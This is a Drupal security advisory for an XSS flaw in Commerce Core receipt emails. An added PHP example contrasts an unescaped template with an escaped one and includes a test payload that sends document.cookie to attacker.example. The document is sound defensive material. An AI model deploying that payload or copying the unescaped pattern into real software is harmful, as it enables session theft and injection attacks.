Commerce Core - Moderately critical - Cross site scripting - SA-CONTRIB-2026-041
Author: Drupal Security Team
CVE references:
CVE-2026-10769
CVE-2026-10770
Project: Commerce Core
Date: 2026-June-03
Security risk: Moderately critical 14/25 AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:Uncommon
Vulnerability: Cross site scripting
Affected versions: >= 3.3.0 < 3.3.6
CVE IDs: CVE-2026-10769
Description: The module doesn't sufficiently sanitize customer comments in the order receipt email template; this could be exploited to achieve Cross-site Scripting (XSS).

This vulnerability is mitigated by the fact that it only affects installations where Checkout (commerce_checkout) is enabled and the "Comments" checkout pane (id: customer_comments) has been explicitly placed in a checkout flow; that pane is disabled by default. Before treating a site as exposed, confirm that the customer_comments pane is enabled in at least one of its checkout flows.

Solution: Install the latest version:
If you use Commerce Core 3.3.x, upgrade to Commerce Core 3.3.6
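The following PHP is an added illustration of the pattern the advisory describes and is not Commerce Core's code or the actual patched template. It places a customer comment into an HTML receipt body unescaped beside the escaped form, and adds a small heuristic for auditing comments already stored on orders placed before the upgrade. Assumptions, all made for this example: the function names and the sample payload are invented; escape_for_html() mirrors what Drupal's Html::escape() does (htmlspecialchars with ENT_QUOTES | ENT_SUBSTITUTE); PHP 8 or later.

```php
<?php
declare(strict_types=1);

// Assumed to match Drupal\Component\Utility\Html::escape(): htmlspecialchars
// with ENT_QUOTES | ENT_SUBSTITUTE so that <, >, &, " and ' all become entities.
function escape_for_html(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (illustration only): the customer_comments value is
// dropped into the HTML mail body verbatim, so any markup it carries is rendered
// by an HTML-capable mail client.
function receipt_html_unsafe(string $orderNumber, string $comment): string {
    return "<p>Order {$orderNumber}</p>\n<p>Customer comment: {$comment}</p>";
}

// Hardened pattern: every untrusted value is escaped at the point it is written
// into HTML, including the order number, which should never be trusted either.
function receipt_html_safe(string $orderNumber, string $comment): string {
    return "<p>Order " . escape_for_html($orderNumber) . "</p>\n"
         . "<p>Customer comment: " . escape_for_html($comment) . "</p>";
}

// Audit heuristic for stored comments: flags anything that would be parsed as
// a tag, comment or processing instruction, or carries a javascript: URL, if it
// were ever emitted unescaped. Expect a few false positives (e.g. "a<b").
function comment_looks_like_markup(string $comment): bool {
    return (bool) preg_match('/<\s*\/?\s*[a-z!?]/i', $comment)
        || stripos($comment, 'javascript:') !== false;
}

// Constructed sample inputs for this example; not real order data.
function self_check(): bool {
    $payload = '<script>document.location="https://attacker.example/?c="'
             . '+document.cookie</script>';
    $benign  = 'Please leave the parcel with the neighbour.';

    $unsafe = receipt_html_unsafe('1001', $payload);
    $safe   = receipt_html_safe('1001', $payload);

    return str_contains($unsafe, '<script>')           // vulnerable body keeps the tag
        && !str_contains($safe, '<script>')            // hardened body does not
        && str_contains($safe, '&lt;script&gt;')       // it is rendered as text instead
        && comment_looks_like_markup($payload)
        && !comment_looks_like_markup($benign);
}

echo self_check() ? "ok\n" : "FAIL\n";
echo receipt_html_safe('1001', '<b>hi</b>'), "\n";
```

The impact depends on where the receipt is rendered: a text/plain mail part is harmless, while webmail and desktop clients that render HTML will execute the injected markup within whatever restrictions they apply. The audit helper is a triage aid only; the fix is to upgrade and to escape at output, not to filter what customers type.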
Reported By:
Brian Willows (hsjbrianwillows)
Fixed By:
Jonathan Sacksick (jsacksick)
Coordinated By:
Greg Knaddison (greggles) of the Drupal Security Team
Lee Rowlands (larowlan) of the Drupal Security Team
Dave Long (longwave) of the Drupal Security Team
Juraj Nemec (poker10) of the Drupal Security Team
Source: www.drupal.org